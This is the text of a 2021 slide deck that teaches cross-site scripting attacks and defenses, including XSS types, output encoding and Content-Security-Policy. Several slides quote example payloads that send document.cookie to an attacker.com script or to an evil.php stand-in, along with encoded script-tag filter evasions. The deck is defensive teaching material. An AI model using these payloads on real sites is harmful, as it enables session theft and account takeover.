XSS Attacks and Defenses Dimitar Boyanov, dimitar.boyanov@gmail.com Software Engineer, Security, Progress April 27, 2021

Agenda  Why  Demo – XSS  What is XSS  Types of XSS  Defenses  Demo - CSP  References  Q & A

Why? – XSS in the news March 21, 2021 Multiple XSS Vulnerabilities Found In Elementor WordPress Plugin Risked Millions of Websites February 24, 2021 Apple Patched A Stored XSS Vulnerability In iCloud Domain February 12, 2021 Reflected XSS Vulnerability Existed In PayPal Currency Conv erter Wallet

DEMO – XSS Attack  What can be achieved by loading a “special” script on a vulnerable site?

OWASP Top 10 (2017) 1. Injection 2. Broken Authentication 3. Sensitive Data Exposure 4. XML External Entities (XXE) 5. Broken Access Control 6. Security Misconfiguration 7. Cross-Site Scripting (XSS) 8. Insecure Deserialization 9. Using Components with Known Vulnerabilities 10. Insufficient Logging & Monitoring

Cross-Site Scripting (XSS)- Definition  XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user- supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.  XSS is the second most prevalent issue in the OWASP Top 10, and is found in around two-thirds of all applications.

Cross-Site Scripting (XSS) – Detect, Reflected  Reflected XSS: The application or API includes unvalidated and unescaped user input as part of HTML output. A successful attack can allow the attacker to execute arbitrary HTML and JavaScript in the victim’s browser. Typically, the user will need to interact with some malicious link that points to an attacker-controlled page, such as malicious watering hole websites, advertisements, or similar.

Cross-Site Scripting (XSS) – Example, Reflected  Example - Reflected XSS:  Core of many phishing schemes  The application uses untrusted data in the construction of the following HTML snippet without validation or escaping: (String) page += "”; The attacker modifies the ‘CC’ parameter in the browser to: '>document.location='http://www.attacker.com/cgi- bin/cookie.cgi?foo='+document.cookie'

Cross-Site Scripting (XSS) – Detect, Stored  Stored XSS: The application or API stores unsanitized user input that is viewed at a later time by another user or an administrator. Stored XSS is often considered a high or critical risk.

Cross-Site Scripting (XSS) - Detect  DOM XSS: JavaScript frameworks, single-page applications, and APIs that dynamically include attacker-controllable data to a page are vulnerable to DOM XSS. Ideally, the application would not send attacker- controllable data to unsafe JavaScript APIs. Typical XSS attacks include session stealing, account takeover, MFA bypass, DOM node replacement or defacement (such as trojan login panels), attacks against the user's browser such as malicious software downloads, key logging, and other client-side attacks.

Cross-Site Scripting (XSS) - Attacks  Attack vectors – Reflected (Request), Persisted (DB), External (CDN) click me! var addr = '../evil.php?cakemonster=' + escape(document.cookie);

Cross-Site Scripting (XSS) - Attacks php print "Not found: " . urldecode($_SERVER["REQUEST_URI"]); ?> http://testsite.test/file_which_not_exist http://testsite.test/alert("TEST");

Cross-Site Scripting (XSS) - Question What is this?  %3C%73%63%72%69%70%74%3E  < s c r i p t >  <script>  +ADw-SCRIPT+AD4-

Cross-Site Scripting (XSS) - Defenses  Validation  Data Preparation  Output encoding  Header protections (defense-in-depth)

Cross-Site Scripting (XSS) – Defenses - Validation  Blacklist  Whitelist  Indirect selection  Parse  Regular expressions

Cross-Site Scripting (XSS) – Defenses – Data Preparation  Encoding  HTTP Response - content-type: text/html; charset=utf-8;  HTML encoding 

Cross-Site Scripting (XSS) – Defenses – Output Encoding  Specific to each injection context  HTML Еlement  HTML Attribute  URL  Javascript  CSS  HTML comment

Cross-Site Scripting (XSS) – Defenses – Header Protections Header protections (defense-in-depth)  HttpOnly flag  Cookies cannot be access from javascript  Content-Security-Policy  Declare which dynamic resources are allowed to load.  script-src, style-src, img-src, connect-src, font-src, etc.

CSP Header Official Spec: https://www.w3.org/TR/CSP3/ Site: https://content-security-policy.com/  CSP Header utilizes modern browsers’ built-in XSS protections  Strong defense-in-depth protection.  It was designed to prevent XSS.  Reduce XSS risks on modern browsers by declaring, which dynamic resources are allowed to load  It can remove the “cross” part of the “cross-site-scripting”  Still not widely used. Only ~6% of top 1M sites use it by 2020.

CSP Fetch Directives  CSP Fetch Directives - control the locations from which certain resource types may be loaded.  default-src – fallback (all)  script-src – restricts the locations from which scripts may be executed  connect-src - directive restricts the URLs which can be loaded using script interfaces  child-src - directive governs the creation of nested browsing contexts (e.g., iframe)  worker-src - restricts the URLs which may be loaded as a Worker, SharedWorker, or ServiceWorker  font-src, frame-src, img-src, media-src, object-src, style-src

CSP – Other Directives  Document Directives - control the locations from which certain resource types may be loaded.  Navigation Directives  form-action - restricts the URLs which can be used as the target of a form submissions from a given context.  frame-ancestors - restricts the URLs which can embed the resource using frame, iframe, object, or embed.  Protects from Clickjacking and Phishing attacks  navigate-to - restricts the URLs to which a document can initiate navigations by any means  Reporting Directives

Demo – CSP Sitefinity CSP directives

How to Discover XSS - Tools  HTTP Proxies (Burp, ZAP)  Static/Dynamic Scanners (Veracode, IBM App Scan)  Vulnerable libraries (Dependency Check, Retire.js)  Penetration testing

Demo – XSS game  http://xss-game.appspot.com/

Summary  XSS allows attackers to execute scripts  Protections  Validation  Data Preparation  Output encoding  Header protections (defense-in-depth) - CSP

Q & A

Thank You! Now It’s Your Turn!